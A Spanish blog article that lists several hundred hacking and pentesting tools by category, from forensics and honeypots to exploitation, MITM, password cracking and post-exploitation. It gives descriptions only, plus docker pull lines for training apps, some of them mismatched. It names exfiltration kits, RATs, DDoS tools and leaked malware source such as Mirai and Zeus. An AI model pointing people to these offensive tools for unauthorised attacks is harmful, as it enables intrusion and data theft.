2026-10-04 Tema: Herramientas para hackear > Listado con más de 400 herramientas de Hacking y Pentesting. Desde LiveCDs hasta Dockers, todas las herramientas de ciberseguridad ¡ DISFRUTALAS ! Si crees que Kali Linux es el único sistema operativo para realizar hacking, estas equivocado. Debido a la sobreexposición a ser hackeados en los últimos años, también han caído en el mercado muchas herramientas o sistemas alternativos. Como están dirigidos a una gran audiencia debido a la popularidad, si estás interesado en realizar hacking, estás en el lugar correcto. En este artículo, hemos seleccionado algunas las mejores herramientas que te podrían ayudar a comenzar o ingresar en este fascinante mundo de la ciberseguridad. Responsabilidad: Todo el contenido de este artículo está destinado solo para fines de investigación en seguridad. Desde Ciberseguridad.blog no se admite el uso de ninguna herramienta para realizar prácticas poco éticas . INDICE: - Auditoría de código Análisis estático - Criptografía - Herramientas CTF - Dockers - Análisis Forense Forense de archivos Respuesta ante incidentes Análisis en vivo Análisis forense de memoria Análisis forense de moviles Análisis Forense de red Misc - Inteligencia - Librerias C Java Phyton Rubi - Distribuciones LiveCD de ciberseguridad - Malware Análisis Dinámico de Malware Honeypots Inteligencia Ops de Ciberseguridad Código fuente Análisis estático de Malware - Red Análisis de red Servicios fakes Manipulación de paquetes Sniffers - Pentesting de Seguridad DoS Exploiting Exploit Recolección de información Fuzzing Pentesting Móvil MITM Password Cracking Escaneo de puertos Post-Explotación Informes de pentesting Servicios Formación en Hacking Pentesting Web Pentesting Wireless - Ciberseguridad Seguridad Cloud Seguridad en Endpoint Privacidad - Ingeniería inversa - Ingeniería social Framework Harvester Phishing ## Auditoría de código ### Análisis estático Brakeman: Un escáner de vulnerabilidad de seguridad de análisis estático para las aplicaciones de Ruby on Rails. ShellCheck: Una herramienta de análisis estático para scripts de shell. ## Criptografía FeatherDuster: Una herramienta automatizada y modular de criptoanálisis. RSATool: Genera clave privada con conocimiento de p y q. Xortool: Una herramienta para analizar el cifrado xor de varios bytes. ## Herramientas CTF CTFd: Fácilmente modificable y tiene todo lo que necesitas para ejecutar un CTF de estilo peligroso. FBCTF: Plataforma para organizar competiciones de Capture the Flag. Mellivora: un motor CTF escrito en PHP. OneGadget: Una herramienta para encontrar un gadget RCE en libc.so.6. NightShade: Un simple Framework de seguridad CTF. OpenCTF: CTF en una caja. Se requiere una configuración mínima. Pwntools: marco de CTF y biblioteca de desarrollo de exploits. Scorebot: Plataforma para CTFs por Legitbs (Defcon). V0lt - Security CTF Toolkit. ## Dockers Docker Bench for Security: Docker Bench for Security comprueba todas las pruebas automatizables en CIS Docker 1.6 Benchmark. docker pull diogomonica/docker-bench-security DVWA - La aplicación web Damn Vulnerable (DVWA) es una aplicación web PHP / MySQL que es muy vulnerable. docker pull citizenstig/dvwa Kali Linux: Esta imagen de Kali Linux Docker proporciona una instalación básica mínima de la última versión de Kali Linux Rolling Distribution. docker pull kalilinux/kali-linux-docker Metasploit: Software de prueba de penetración Metasploit Framework. docker pull bkimminich/juice-shop OWASP Juice Shop: Una aplicación web intencionalmente insegura para entrenamientos de seguridad escrita enteramente en Javascript que abarca todo el OWASP Top Ten y otros graves fallos de seguridad. docker pull citizenstig/nowasp OWASP Mutillidae II - Aplicación de práctica de prueba de pluma web OWASP Mutillidae II. docker pull citizenstig/nowasp OWASP NodeGoat: un entorno para conocer cómo los principales riesgos de seguridad de OWASP se aplican a las aplicaciones web desarrolladas con Node.js y cómo abordarlas de manera efectiva. git clone https://github.com/OWASP/NodeGoat.git docker-compose build && docker-compose u OWASP Railsgoat: Una versión vulnerable de Rails que sigue el Top 10 de OWASP. docker pull owasp/railsgoat OWASP Security Shepherd: Una plataforma de capacitación en seguridad para aplicaciones web y móviles. docker pull ismisepaul/securityshepherd OWASP WebGoat: Una aplicación web deliberadamente insegura. docker pull danmx/docker-owasp-webgoat OWASP ZAP - Versión actual de proxy de ataque owasp zed insertado en un contenedor. docker pull owasp/zap2docker-stable Security Ninjas: Un programa de capacitación en seguridad de aplicaciones de código abierto. docker pull opendns/security-ninjas SpamScope - SpamScope (herramienta avanzada de análisis de correo no deseado) con Elasticsearch. docker pull fmantuano/spamscope-elasticsearch Instalación Vulnerable de WordPress - Instalación vulnerable de WordPress. docker pull wpscanteam/vulnerablewordpress Vulnerabilidad como servicio Heartbleed: Vulnerabilidad como servicio: CVE 2014-0160. docker pull hmlio/vaas-cve-2014-0160 Vulnerabilidad como servicio: Shellshock - Vulnerabilidad como servicio: CVE 2014-6271. docker pull hmlio/vaas-cve-2014-6271 WPScan - WPScan es un escáner de vulnerabilidad WordPress de recuadro negro. docker pull wpscanteam/wpscan ## Análisis Forense ### Forense de archivos Autopsy: Una plataforma forense digital e interfaz gráfica para The Sleuth Kit y otras herramientas forenses digitales. DFF: Un marco forense que viene con línea de comando e interfaces gráficas. DFF se puede utilizar para investigar discos duros y memoria volátil y crear informes sobre las actividades del usuario y del sistema. Docker Explorer: Una herramienta para ayudar a la adquisiciones forense de docker sin conexión. Hadoop_framework: Un sistema prototipo que utiliza Hadoop para procesar imágenes del disco duro. OSXCollector: Un conjunto de herramientas de análisis y recopilación de evidencia forense para OS X. Scalpel: Herramienta de talla de datos de código abierto. Shellbags: Para investigar los archivos NT_USER.dat. Sleuthkit: Una biblioteca y colección de herramientas forenses digitales de línea de comando. ### Respuesta ante incidentes Hunter: Un entorno de búsqueda de amenazas / análisis de datos basado en Python, Pandas, PySpark y Jupyter Notebook. ### Análisis en vivo OS X Auditor: OS X Auditor es una herramienta informática forense gratuita de Mac OS X. Windows-event-forwarding: Un repositorio para usar el reenvío de eventos de Windows para la detección y respuesta a incidentes. ### Análisis forense de memoria Rekall - Marco de análisis de memoria desarrollado por Google. Volacity: extrae artefactos digitales de muestras de memoria volátil (RAM). ### Análisis forense de moviles Android Forensic Toolkit: Permite extraer registros de SMS, historial de llamadas, fotos, historial de navegación y contraseña desde un teléfono Android. Mem: Herramienta utilizada para volcar memoria desde dispositivos Android. ### Análisis Forense de red Dshell: Un marco de análisis forense de red. Passivedns: Un detector de red que registra todas las respuestas del servidor DNS para usar en una configuración pasiva de DNS. ### Misc Diffy: Una herramienta digital de análisis forense y respuesta ante incidentes (DFIR) desarrollada por el Equipo de Inteligencia y Respuesta de Seguridad de Netflix (SIRT). Permite que un investigador forense alcance rápidamente un compromiso en las instancias de la nube durante un incidente y clasifique esas instancias para las acciones de seguimiento. HxD: Editor hexadecimal que, además de la edición y modificación del disco sin formato de la memoria principal (RAM), maneja archivos de cualquier tamaño. Libfvde - Biblioteca y herramientas para acceder a volúmenes encriptados de FileVault Drive Encryption (FVDE). ## Ciberinteligencia Attackintel: Una secuencia de comandos python para consultar la API MITER ATT&CK para tácticas, técnicas, mitigaciones y métodos de detección para grupos de amenazas específicos. VIA4CVE: Un agregador de la base de datos de vulnerabilidades de proveedores conocidos para admitir la expansión de información con CVE. ## Librerias ### C Libdnet: Proporciona una interfaz simplificada y portátil para varias rutinas de red de bajo nivel, incluida la manipulación de direcciones de red, kernel arp cache y búsqueda y manipulación de tabla de rutas, firewalls de red, búsqueda y manipulación de la interfaz de red, tunneling IP y paquetes de IP sin procesar y Ethernet transmisión. ### Java Libsignal-service-java : Una biblioteca Java / Android para comunicarse con el servicio de mensajes de señal. ### Python Amodem: Audio MODEM Communication Library en Python. Dpkt: Creación / análisis rápido y simple de paquetes, con definiciones para los protocolos TCP / IP básicos. Pcapy: Un módulo de extensión de Python que interactúa con la biblioteca de captura de paquetes libpcap. Pcapy permite que las secuencias de comandos python capturen paquetes en la red. Pcapy es muy eficaz cuando se utiliza junto con un paquete de manejo de paquetes como Impacket, que es una colección de clases de Python para construir y diseccionar paquetes de red. PyBFD :Interfaz de Python con la biblioteca del Descriptor de Archivo Binario (BFD) de GNU. Pynids: Un contenedor de Python para Libnids, una biblioteca del Sistema de Detección de Intrusos de Red que ofrece rastreo, desfragmentación de IP, reensamblaje de flujo TCP y detección de escaneo de puerto TCP. Deje que sus propias rutinas python examinen las conversaciones de red. Pypcap: Este es un contenedor Python simplificado orientado a objetos para libpcap. PyPDF2: Una utilidad para leer y escribir archivos PDF con Python. Python-ptrace: Enlace de Python de la biblioteca ptrace. RDPY: RDPY es una implementación pura de Python del protocolo Microsoft RDP (Protocolo de escritorio remoto) (lado del cliente y del servidor). Scapy: un programa interactivo de manipulación de paquetes basado en Python y biblioteca. ### Ruby Secureheaders: Encabezados relacionados con la seguridad, todo en una joya. ## Distribuciones LiveCD de ciberseguridad Android Tamer: plataforma virtual / en vivo para profesionales de seguridad de Android. ArchStrike: un repositorio de Arch Linux para entusiastas y profesionales de la seguridad. BackBox: Distribución basada en Ubuntu para pruebas de penetración y evaluaciones de seguridad. BlackArch: Distribución basada en Arch Linux para probadores de penetración e investigadores de seguridad. BOSSLive: Una distribución india de GNU / Linux desarrollada por CDAC y personalizada para satisfacer el entorno digital de la India. Es compatible con la mayoría de los idiomas de la India. DEFT Linux - Suite dedicada a la respuesta ante incidentes y análisis forense digital. Fedora Security Lab: Un entorno de prueba seguro para trabajar en auditorías de seguridad, análisis forense, rescate de sistemas y metodologías de prueba de seguridad en universidades y otras organizaciones. Kali: Una distribución de Linux diseñada para análisis forense digital y pruebas de penetración. NST: distribución de Network Security Toolkit. Ophcrack: Un cracker de contraseñas gratuito de Windows basado en tablas rainbow. Es una implementación muy eficiente de tablas de arcoiris realizadas por los inventores del método. Viene con una interfaz gráfica de usuario y se ejecuta en múltiples plataformas. Parrot: Distribución de seguridad GNU / Linux diseñada con pentesting en la nube y seguridad de la IoT en mente. Pentoo: Livecd centrado en la seguridad basado en Gentoo. REMnux: Toolkit para ayudar a los analistas de malware con el software malicioso de ingeniería inversa. ## Malware ### Análisis dinámico de malware Androguard: Ingeniería inversa, análisis de malware y goodware de aplicaciones de Android. Cuckoo Sandbox: Un sistema automatizado de análisis dinámico de malware. CuckooDroid :Análisis automatizado de malware de Android con Cuckoo Sandbox. DECAF : Abreviatura de Dynamic Ejecutable Code Analysis Framework, es una plataforma de análisis binario basada en QEMU. DroidBox: Análisis dinámico de aplicaciones de Android. Hooker: Un proyecto de código abierto para análisis dinámicos de aplicaciones de Android. Jsunpack-n: Emula la funcionalidad del navegador cuando visita una URL. Magento-malware-scanner: Una colección de reglas y ejemplos para detectar el malware Magento. Malzilla: Las páginas web que contienen exploits a menudo usan una serie de redireccionamientos y códigos ofuscados para que sea más difícil de seguir para alguien. MalZilla es un programa útil para explorar páginas maliciosas. Permite elegir nuestro propio agente de usuario y referencia, y tiene la capacidad de usar proxies. Muestra la fuente completa de páginas web y todos los encabezados HTTP. Te da varios decodificadores para intentar desofuscar javascript también. ProbeDroid: Un kit de instrumentación binario dinámico dirigido a Android (Lollipop) 5.0 y superior. PyEMU: Emulador IA-32 completamente programable, útil para el análisis de malware. Uitkyk: Marco de análisis de memoria de tiempo de ejecución para identificar malware de Android. WScript Emulator: Emulador / rastreador de la funcionalidad de Windows Script Host. ### Honeypots Basic-auth-pot : Autenticación básica de HTTP honeyPot. Conpot : ICS / SCADA honeypot. Cowrie: SSH honeypot, basado en Kippo. Elastichoney: Un simple honeypot Elasticsearch. ESPot: Un honeypot de Elasticsearch escrito en NodeJS, para capturar todos los intentos de explotar CVE-2014-3120. Delilah: Un Honeypot Elasticsearch escrito en Python. Dionaea: Honeypot diseñado para atrapar malware. Glastopf: Aplicación web Honeypot. Glutton : Todos comiendo honeypot. Honeyd : Crea una honeynet virtual. HoneyPress: Python basado en WordPress honeypot en un contenedor acoplable. HonnyPotter: Un honeypot de inicio de sesión de WordPress para recopilar y analizar intentos de inicio de sesión fallidos. Maildb - Aplicación web de Python para analizar y rastrear archivos HTTP y Pcap http. MHN: Gestión de sensores multi-snort y honeypot, utiliza una red de máquinas virtuales, instalaciones SNORT de huella pequeña, dionae sigilosas y un servidor centralizado para administración. Mnemosyne: Un normalizador para datos de honeypot, es compatible con Dionaea. MongoDB-HoneyProxy: Un proxy de honeypot para mongodb. Cuando se ejecuta, esto servirá de proxy y registrará todo el tráfico a un servidor ficticio mongodb. MysqlPot: Un honeypot de mysql, todavía muy temprano. Nodepot: Un nodo de aplicación web de nodejs. NoSQLPot: NoSQL Honeypot Framework. Phoneyc: Implementación de HoneyClient de Pure Python. Phpmyadmin_honeypot: Un honeypot phpMyAdmin simple y efectivo. Servletpot: Aplicación web Honeypot. Shadow Daemon: Un firewall de aplicaciones web modular / High-Interaction Honeypot para aplicaciones PHP, Perl y Python. Smart-honeypot: PHP Script que demuestra una olla de miel inteligente. SpamScope: Fast Advanced Spam Analysis Tool. Thug: HoneyClient de baja interacción, para la investigación de sitios web maliciosos. Wordpot: Un WordPress Honeypot. Wp-smart-honeypot: Plugin de WordPress para reducir el spam de comentarios con un honeypot más inteligente. ### Inteligencia Módulos MISP: Módulos para servicios de expansión, importación y exportación en MISP. Passivedns-client: Proporciona una biblioteca y una herramienta de consulta para consultar varios proveedores pasivos de DNS. Rt2jira : Convierte boletos RT a boletos JIRA. ### Ops de Ciberseguridad Al-khaser: técnicas de malware público utilizadas en la naturaleza: máquina virtual, emulación, depuradores, detección de espacio aislado. CapTipper: Una herramienta de python para analizar, explorar y revivir el tráfico malicioso de HTTP. CSCGuard: Protege y registra el uso sospechoso y malicioso de .NET CSC.exe y Runtime C # Compilation. Google-play-crawler: Google-play-crawler es simplemente una herramienta de Java para buscar aplicaciones de Android en GooglePlay y también descargarlas. Googleplay-api: Una API de Python no oficial que nos permite buscar, explorar y descargar aplicaciones de Android de Google Play (anteriormente Android Market). ImaginaryC2: Una herramienta de python que tiene como objetivo ayudar en el análisis conductual (de red) del malware. Imaginary C2 aloja un servidor HTTP que captura las solicitudes HTTP hacia dominios / IP seleccionados selectivamente. Además, la herramienta tiene como objetivo facilitar la reproducción de las respuestas de Command-and-Control capturadas / cargas útiles servidas. FakeNet-NG: Una herramienta de análisis de red dinámica de próxima generación para analistas de malware y probadores de penetración. Es de código abierto y está diseñado para las últimas versiones de Windows. Malboxes: Crea análisis de malware Windows VM para que no sea necesario. Mquery: Acelerador de consultas de malware YARA (web frontend). Node-appland: Herramienta NodeJS para descargar APK de appland. Node-aparatoide: NodeJS para descargar APK de aptoide. Node-google-play: Llama a las API de Google Play desde el node. ### Código fuente Android-malware: Colección de muestras de malware de Android. Carberp: Carberp gastó el código fuente. Fancybear: Código Fuente Fancy Bear. Mirai: Código fuente de Mirai filtrado para fines de investigación / desarrollo de la IoC. Morris Worm: el código fuente original de Morris Worm. TinyNuke: troyano bancario estilo Zeus. Zeus: Zeus versión 2.0.8.9, se filtró en 2011. ### Análisis estático de Malware Androwarn: Detecta y advierte al usuario sobre posibles comportamientos maliciosos desarrollados por una aplicación de Android. ApkAnalyser: Una herramienta de análisis virtual estática para examinar y validar el trabajo de desarrollo de su aplicación de Android. APKinspector: Una poderosa herramienta GUI para que los analistas analicen las aplicaciones de Android. Argus-SAF: Marco de análisis estático de Argus. CFGScanDroid: Control Flow Graph Scanning para Android. ConDroid: ejecución simbólica / concólica de aplicaciones de Android. DroidLegacy: Scripts de análisis estático. Floss: FireEye Labs Obfuscated String Solver. Extrae automáticamente las cadenas ofuscadas del malware. FSquaDRA: Detección rápida de aplicaciones de Android reenvasados basadas en la comparación de los archivos de recursos incluidos en el paquete. Inspeckage: Inspector de paquetes de Android, análisis dinámico con ganchos de api, iniciar actividades no expuestas y más. Maldrolyzer: Framework sencillo para extraer datos "procesables" del malware de Android (C&C, números de teléfono, etc.). Peepdf: Una herramienta de Python para explorar archivos PDF con el fin de averiguar si el archivo puede ser dañino o no. El objetivo de esta herramienta es proporcionar todos los componentes necesarios que un investigador de seguridad podría necesitar en un análisis PDF sin utilizar 3 o 4 herramientas para realizar todas las tareas. PEfile: Lee y funciona con archivos Portable Executable (aka PE). PEview: Una forma rápida y fácil de ver la estructura y el contenido de los archivos Portable Executable (PE) de 32 bits y de formato de archivo de objetos componentes (COFF). Pdfminer: Una herramienta para extraer información de documentos PDF. PScout: Analizando la Especificación de Permiso de Android. Smali-CFGs: Smali Control Flow Graph's. SmaliSCA - Análisis de código estático de Smali. Suite Sysinternals: las utilidades de solución de problemas de Sysinternals. Yara: Identifica y clasifica muestras de malware. ## Red ### Análisis de red Bro: Un potente marco de análisis de red que es muy diferente de los IDS típicos que quizás conozcas. Pytbull: Framework de prueba de IDS / IPS flexible basado en Python. Sguil: Sguil (pronunciado sgweel) es construido por analistas de seguridad de red para analistas de seguridad de red. El componente principal de Sguil es una GUI intuitiva que proporciona acceso a eventos en tiempo real, datos de sesión y capturas de paquetes sin formato. ### Servicios fakes DNSChef: Proxy DNS para analizadores de penetración y analistas de malware. DnsRedir: Un pequeño servidor DNS que responderá a ciertas consultas con direcciones provistas en la línea de comando. ### Manipulación de paquetes Pig: Una herramienta de elaboración de paquetes de Linux. Yersinia: Una herramienta de red diseñada para aprovechar algunos debilitamientos en diferentes protocolos de red. Pretende ser un marco sólido para analizar y probar las redes y sistemas implementados. ### Sniffers Cloud-pcap: Almacenamiento y análisis web PCAP. Dnscap: utilidad de captura de red diseñada específicamente para el tráfico de DNS. Dripcap: Analizador de paquetes cafeínado. Dsniff: Una colección de herramientas para auditoría de redes y pentesting. Justniffer: No es solo un Sniffer de paquetes TCP de red. Justniffer es un analizador de protocolo de red que captura el tráfico de red y produce registros de forma personalizada, puede emular los archivos de registro del servidor web Apache, rastrear los tiempos de respuesta y extraer todos los archivos "interceptados" del tráfico HTTP. Moloch: Moloch es un sistema de captura, indexación y base de datos completo y de PCAP a gran escala de fuente abierta. Net-creds: Esnifa datos confidenciales de la interfaz o pcap. NetworkMiner: Herramienta de análisis forense de red (NFAT). Netsniff-ng: Una navaja suiza para su instalación diaria de redes de Linux. OpenFPC - OpenFPC es un conjunto de scripts que se combinan para proporcionar una grabadora de tráfico de red ligera y paquetes completos y una herramienta de almacenamiento en búfer. Su objetivo de diseño es permitir que los usuarios no expertos implementen una grabadora de tráfico de red distribuida en el hardware COTS mientras se integran en las herramientas existentes de alerta y registro. PF_RING: PF_RING ™ es un módulo de kernel de Linux y un marco de espacio de usuario que nos permite procesar paquetes a altas tasas y al mismo tiempo proporcionar una API consistente para las aplicaciones de procesamiento de paquetes. WebPcap: Un analizador de paquetes basado en la web (arquitectura cliente / servidor). Útil para analizar aplicaciones distribuidas o dispositivos integrados. Wireshark: un analizador de paquetes de código abierto y gratuito. ## Pentesting de Seguridad ### DoS DHCPig: Secuencia de comandos de agotamiento de DHCP escrita en python con una biblioteca de red scapy. LOIC: Cañón de iones de órbita baja - Una herramienta de tensión de red de código abierto, escrita en C#. Basado en el proyecto LOIC de Praetox. Aplicación Sockstress - Sockstress (TCP DoS). T50: La herramienta de estrés de red más rápida. Torshammer: Martillo de Tor. Herramienta lenta de publicación de DDOS escrita en python. UFONet: Abusa OSI Layer 7-HTTP para crear / administrar 'zombies' y para llevar a cabo diferentes ataques usando; GET/POST, multihebra, proxies, métodos de spoofing de origen, técnicas de evasión de caché, etc. ### Exploiting BeEF: El Proyecto de Marco de Explotación del Navegador. Commix: Herramienta automatizada de inyección y explotación de comandos del sistema operativo todo en uno. DLLInjector: inyecta dlls en procesos. Drupwn: Herramienta de enumeración y explotación de Drupal. ExploitPack: Herramienta gráfica para pruebas de penetración con muchos exploits. Evilgrade: El marco de explotación de la actualización. Fathomless: Una colección de diferentes programas para el trabajo red team. Linux Exploit Suggester: Linux Exploit Suggester, basado en el número de versión del sistema operativo. Metasploit Framework: Marco de explotación. Nessus: Evaluación de vulnerabilidad, configuración y cumplimiento. Nexpose: Software de Gestión de Riesgos y Gestión de Vulnerabilidades. OpenVAS: Explorador y administrador de vulnerabilidades de código abierto. PowerSploit: Un marco de post-explotación de PowerShell. PSKernel-Primitives: Primitivas de explotación para PowerShell. ROP Gadget: Marco para la explotación de ROP. Routersploit: Software automatizado de prueba de penetración para el enrutador. Rupture: Un framework para BREACH y otros ataques de cifrado basados en compresión. Shellen: Entorno de shelling interactivo para crear fácilmente shellcodes. Shellsploit: Permite generar shellcodes personalizados, puertas traseras e inyectores para varios sistemas operativos. Y vamos a ofuscar cada byte a través de codificadores. SPARTA: Herramienta de prueba de penetración de infraestructura de red. Spoodle: Un subdominio masivo + escáner de vulnerabilidad poodle. Veil Framework: Una herramienta diseñada para generar cargas útiles de metasploit que evitan las soluciones antivirus comunes. Vuls: Escáner de vulnerabilidad para Linux / FreeBSD, sin agente, escrito en Go. Explorador de Windows Suggester: Detecta posibles parches faltantes en el destino. Zarp: Herramienta de ataque de red. ### Exploits Bluedroid: PoCs de vulnerabilidades en BlueDroid. Chakra-2016-11: Exploit de prueba de concepto para bugs Edge (CVE-2016-7200 y CVE-2016-7201). CVE-2018-8120: CVE-2018-8120. CVE-2018-8897: Implementa la vulnerabilidad POP / MOV SS (CVE-2018-8897) mediante la comprobación de errores de la máquina (DoS local). HolicPOC: CVE-2015-2546, CVE-2016-0165, CVE-2016-0167, CVE-2017-0101, CVE-2017-0263, CVE-2018-8120. Jira-Scan: Escáner Jira para CVE-2017-9506. MS17-010: Exploits para MS17-010. Ruby-advisory-db: Una base de datos de Ruby Gems vulnerable. The Exploit Database: El repositorio oficial de Base de datos Exploit. Exploits XiphosResearch : Código de explotación de prueba de concepto diverso escrito en Xiphos Research para fines de prueba. ### Recolección de información Bundler-audit: Verificación del nivel de parche para Bundler. Dnsenum: Una secuencia de comandos de Perl que enumera la información de DNS. Dnsmap: Correlacionador pasivo de red DNS. Dnsrecon: Script de enumeración de DNS. Knock: Una herramienta de python diseñada para enumerar subdominios en un dominio objetivo a través de una lista de palabras. IVRE: Un marco de código abierto para reconocimiento de red. Se basa en herramientas conocidas de código abierto para recopilar datos (inteligencia de red), almacenarlos en una base de datos y proporciona herramientas para analizarlos. Operative Framework: Este es un marco basado en la acción de huellas dactilares, esta herramienta se utiliza para obtener información en un sitio web o un objetivo de empresa con múltiples módulos (búsqueda de Viadeo, búsqueda de Linkedin, whois de correo electrónico inverso, Whois inverso de ip, análisis forense de archivos SQL ... .). Recon-ng: Un marco de reconocimiento Web completo con todas las funciones escrito en Python. SMBMap: Una útil herramienta de enumeración de SMB. SSLMap: Escáner de suite de cifrado TLS / SSL. Subbrute: Una araña de meta-consulta de DNS que enumera registros DNS y subdominios. SubFinder: Herramienta de descubrimiento de subdominios que descubre subdominios válidos para sitios web. Diseñado como un marco pasivo para ser útil para recompensas de errores y seguro para pruebas de penetración. TruffleHog: busca en repositorios de git cadenas de alta entropía, profundizando en el historial de confirmaciones. URLextractor: Recopilación de información y reconocimiento de sitios web. VHostScan: Escáner de host virtual que realiza búsquedas inversas, se puede usar con herramientas pivote, detectar escenarios catch-all, alias y páginas predeterminadas dinámicas. Wmap: Recopilación de información para piratería web. XRay: Una herramienta para reconocimiento, mapeo y recolección de OSINT de redes públicas. ### Fuzzing AndroFuzz: Una utilidad de fuzz para Android que se centra en la información y las partes de entrega del proceso de fuzzing. Construct: Estructuras de datos declarativas para python que permiten el análisis sintáctico y la construcción. Fusil: Una biblioteca de Python utilizada para escribir programas de fuzzing. Ayuda a iniciar el proceso con un entorno preparado (límite de memoria, variables de entorno, redirección de stdout, etc.), iniciar cliente o servidor de red y crear archivos dañados. Fuzzbox: Una herramienta de fuzzing multimedia de varios códecs. Fuzzlyn: Fuzzer para las cadenas de herramientas .NET, utiliza a Roslyn para generar programas aleatorios de C#. Honggfuzz: Fuzzer orientado a la seguridad con poderosas opciones de análisis. Admite un fuzz evolutivo basado en la retroalimentación basado en la cobertura del código (sw y hw). Melkor-android: Un puerto Android del fuzzer melkor ELF. MFFA: Media Fuzzing Framework para Android. Netzob: Netzob es una herramienta de código abierto para ingeniería inversa, generación de tráfico y fuzzing de protocolos de comunicación. Python-AFL: Servidor de bifurcación americano e instrumentación para código Python puro. Radamsa-android: Un puerto Android de radamsa fuzzer. SecLists: Una colección de múltiples tipos de listas utilizadas durante las evaluaciones de seguridad. Sulley: El desarrollo de Fuzzer y el marco de prueba de fuzz que consta de múltiples componentes extensibles. TAOF: The Art of Fuzzing, incluido ProxyFuzz, un fuzzer de red no determinista de hombre en el medio. Windows IPC Fuzzing Tools: Una colección de herramientas utilizadas para atacar aplicaciones que usan los mecanismos de comunicación de Windows Interprocess. Zulu: Un fuzzer diseñado para el prototipado rápido que normalmente ocurre en un compromiso del cliente donde algo necesita ser transferido dentro de escalas de tiempo ajustadas. ### Pentesting Móvil AFE: Android Framework for Exploitation, es un marco para explotar dispositivos basados en Android. AndroBugs: Un escáner de vulnerabilidad de Android eficiente que ayuda a los desarrolladores o hackers a encontrar posibles vulnerabilidades de seguridad en las aplicaciones de Android. Android-vts: Android Vulnerability Test Suite: siguiendo el espíritu de la recopilación de datos abiertos, y con la ayuda de la comunidad, analicemos el estado de la seguridad de Android. Androl4b: Una máquina virtual para evaluar aplicaciones de Android, ingeniería inversa y análisis de malware. CobraDroid: Una compilación personalizada del sistema operativo Android diseñada específicamente para analistas de seguridad de aplicaciones y para personas que manejan malware móvil. Drozer: El marco de evaluación de seguridad líder para Android. Idb: Una herramienta para simplificar algunas tareas comunes para iOS pentesting e investigación. Introspy-iOS: Perfil de seguridad para blackbox iOS. JAADAS: Asesoramiento Conjunto de Defectos Avanzados para aplicaciones de Android. Mobile Security Framework: Un marco de prueba de pluma automatizado inteligente, todo en uno, de aplicación de código abierto (Android / iOS / Windows) capaz de realizar análisis estáticos, dinámicos y pruebas de API web. QARK: QARK de LinkedIn es para que los desarrolladores de aplicaciones escaneen la aplicación en busca de problemas de seguridad. ### MITM (Man In The Midle) Dnsspoof: DNS spoofer. Elimina las respuestas de DNS del enrutador y lo reemplaza con la respuesta de DNS falsificada. Ettercap: Una suite completa para hombres en medio de ataques. Cuenta con olfateo de conexiones en vivo, filtrado de contenido sobre la marcha y muchos otros trucos interesantes. Es compatible con la disección activa y pasiva de muchos protocolos e incluye muchas características para el análisis de red y host. Bettercap: Una herramienta potente, flexible y portátil creada para realizar diversos tipos de ataques MITM contra una red, manipular el tráfico HTTP, HTTPS y TCP en tiempo real, buscar credenciales y mucho más. Mallory: Un hombre extensible de TCP / UDP en el proxy intermedio que está diseñado para ejecutarse como una puerta de enlace. A diferencia de otras herramientas de este tipo, Mallory admite la modificación de protocolos no estándares sobre la marcha. MITMf: Framework para ataques Man-In-The-Middle. Mitmproxy: Un proxy hombre-en-el-medio interactivo con capacidad para SSL para HTTP con una interfaz de consola. Mitmsocks4j: El hombre en el medio SOCKS Proxy para JAVA. Nogotofail: Una herramienta de prueba de seguridad de tráfico de red blackbox en ruta. Responde: Un envenenador LLMNR, NBT-NS y MDNS, con servidor de autenticación rogue HTTP/SMB/MSSQL/FTP/LDAP incorporado compatible con NTLMv1 / NTLMv2 / LMv2, NTLMSSP de seguridad extendida y autenticación HTTP básica. Ssh-mitm: Una herramienta de hombre en el medio SSH / SFTP que registra sesiones interactivas y contraseñas. ### Password Cracking BozoCrack: un cracker MD5 tonto y efectivo en Ruby. Common-substr: Script awk simple para extraer las subcadenas más comunes de un texto de entrada. Creado para descifrar contraseñas. HashCat: La herramienta de recuperación de contraseñas más rápida y avanzada del mundo. Hob0Rules: Reglas de descifrado de contraseñas para Hashcat basadas en patrones y patrones de la industria. John the Ripper: Un rápido cracker de contraseñas. THC-Hydra: Un cracker de inicio de sesión de rojo muy rápido que admite muchos servicios diferentes. ### Escaneo de puertos Angry IP Scanner: escáner de red rápido y amigable. Masscan: Escáner de puerto TCP, arroja paquetes SYN de forma asíncrona, escaneando Internet en menos de 5 minutos. Nmap: Escáner de seguridad gratuito para auditorías de seguridad y exploración de redes. Watchdog: una exploración de seguridad completa y una herramienta de administración de vulnerabilidades. Zmap: un escáner de red de código abierto que permite a los investigadores realizar fácilmente estudios de redes en Internet. ### Post-Explotación CrackMapExec: Una herramienta posterior a la explotación que ayuda a automatizar la evaluación de la seguridad de grandes redes de Active Directory. CredCrack: Una cosechadora de credenciales rápida y sigilosa. Creddump: Vuelque las credenciales de Windows. DBC2: DropboxC2 es una herramienta modular de post-explotación, compuesta de un agente que se ejecuta en la máquina de la víctima, un controlador, que se ejecuta en cualquier máquina, módulos de PowerShell y servidores de Dropbox como medio de comunicación. DET: Data Exfiltration Toolkit (DET). Dnsteal: Herramienta de DNS Exfiltration para enviar sigilosamente archivos a través de solicitudes de DNS. Empire: Empire es un agente de post-explotación pura de PowerShell. Enumdb: Herramienta de fuerza bruta y post-explotación de MySQL y MSSQL para buscar bases de datos y extraer información confidencial. EvilOSX: Una herramienta de python pura, post-explotación, RAT (Remote Administration Tool) para macOS / OSX. Fireaway: Herramienta de derivación y auditoría de cortafuegos de nueva generación. FruityC2: Un marco posterior a la explotación (y de código abierto) basado en el despliegue de agentes en máquinas comprometidas. Los agentes se administran desde una interfaz web bajo el control de un operador. GetVulnerableGPO: Secuencia de comandos de PowerShell para buscar GPO 'vulnerables' relacionados con la seguridad que deberían reforzarse. Iodine: Permite canalizar datos IPv4 a través de un servidor DNS. Koadic: Koadic C3 COM Command & Control - JScript RAT. Mallory: Proxy HTTP / HTTPS sobre SSH. Mimikatz: Una pequeña herramienta para jugar con la seguridad de Windows. Mimikittenz: una herramienta power-shell post-explotación para extraer información jugosa de la memoria. P0wnedShell: PowerShell Runspace Post Exploitation Toolkit. ProcessHider: Herramienta posterior a la explotación para ocultar procesos de aplicaciones de supervisión. PowerOPS: Herramienta de explotación de publicaciones portátil PowerShell Runspace destinada a hacer que las pruebas de penetración con PowerShell sean "más fáciles". Poet: Herramienta post-explotación. Pupy: Una administración remota de código abierto (Windows, Linux, OSX, Android) y herramienta posterior a la explotación escrita principalmente en python. Pwnat: Perfora agujeros en firewalls y NAT permitiendo que cualquier número de clientes detrás de NAT se conecte directamente a un servidor detrás de un NAT diferente. RemoteRecon: Reconocimiento remoto y colección. SpYDyishai: Una cosechadora de credenciales de Gmail. 